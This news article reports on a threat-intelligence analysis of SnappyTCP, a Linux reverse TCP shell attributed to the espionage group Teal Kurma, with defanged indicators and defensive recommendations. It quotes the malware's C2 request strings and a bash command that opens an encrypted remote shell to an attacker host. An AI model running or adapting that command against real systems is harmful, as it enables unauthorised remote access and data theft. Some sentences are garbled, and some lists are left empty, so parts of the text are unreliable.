Hackers exploit reverse TCP shells on Linux or Unix systems to gain unauthorized remote access. This enables them to do the following illicit activities by exploiting vulnerabilities while masking their identity and location:-
- Execute commands
- Exfiltrate data
- Compromise the system’s security
Cybersecurity researchers at PwC recently discovered a reverse TCP shell for Linux or Unix systems with C2 capabilities while analyzing one of the malware of Teal Kurma (a.k.a. Sea Turtle, Marbled Dust, Cosmic Wolf) dubbed ‘SnappyTCP’.
Besides this, the three years Teal Kurma was initially tracked three years ago, and it primarily focuses on the targets throughout:-
SnappyTCP: Reverse TCP Shell
Since 2017, Teal Kurma has been exploiting vulnerabilities, especially CVEs like-
After gaining access, they run “upxa.sh,” and then communicate with a server under their control with the help of an executable they dropped by them.
With basic C2 capabilities and persistence functions, the Webshell is a Linux/Unix reverse TCP shell. Besides this, two variants exist, and they do the following things:-
- One variant secures connections with OpenSSL over TLS.
- Another variant sends cleartext requests.
The non-TLS malware reads “conf” file, extracts IP from the first 256 bytes, and connects via TCP socket with the command:-
- GET /sy.php HTTP/1.1rnHost: %srnHostname: %srnrn”, host_name, host_name
sy.php hosted at hxxp://lo0[.]systemctl[.]network/sy.php since July 2021, linked to 2022 Greek CERT alert, suggesting sustained use. Recent infrastructure in 2023 linked to SnappyTCP via CERT alert indicators.
Malware scans for “X-Auth-43245-S-20” and “rnrn” in HTTP request, then triggers TCP reverse shell. Using OpenSSL and TLS certificates for a secure link, the malware, in other cases, connects to an IP from the conf file, and then it sends:-
- GET /ssl.php HTTP/1.1\r\nHost: %s\r\nHostname: %s\r\nConnection: close\r\n\r\n
Similar to past instances, it spawns a pthread calling bash to execute a different file, ‘update,’ not ‘kdd_launch’:-
- bash -c \”./update exec:’bash -li’,pty,stderr,setsid,sigint,sane OPENSSL:%s:%d,verify=0 2>&1>/dev/null&\”
SnappyTCP binaries use various toolchains (Table 1). GLIBC is statically linked, enabling self-contained operation without linking to the target machine’s library files.
However, besides this, the execution methods vary, resulting in either a shared object file or an executable.
The ELF files lack compile dates, as it helps in hiding the linking variations in toolchain usage to malware evolution. Multiple developers or cross-compilation for diverse architectures might explain the toolchain diversity.
The GitHub repository reveals Teal Kurma’s reverse TCP shell mirroring public code, with ‘update’ replacing ‘connector.’ Other samples in the repository establish reverse shells, possibly tied to Teal Kurma’s activity.
The analyzed samples pivoted on SnappyTCP GET requests and used Sea Turtle reporting (e.g., 2022 Greek CERT alert) for the Teal Kurma infrastructure hunt. Identified suspicious domains like hxxp://108.61.103[.]186/sy.php and ybcd[.]tech. Explored CERT infrastructure and found active links:-
- 168.100.10[.]187
- 93.115.22[.]212
Uncovered TLS certificates tied to Media and NGO sectors, targeting the Middle East, using the reverse shell for espionage. Victimology suggests a focus on the following entities for sensitive data:-
- Governments
- Telecom
- IT providers
Telecom holds customer metadata, and tech companies are vulnerable to island-hopping attacks. Threat actors aim for surveillance or traditional intelligence, with NGO and media sectors also targeted.
TLS certificates indicate the Middle East and North Africa focus; SnappyTCP is likely in European countries. Targeting details aids attribution and provides insights for organizations in similar regions or sectors.
Recommendations
Here below, we have mentioned all the recommendations provided by the security researchers:-
- Make sure to check the logs
- Set up alerts for blog indicators
- If found, then make sure to investigate the origins
- If found, then conduct forensic analysis
- Block malicious indicators if there are no significant findings.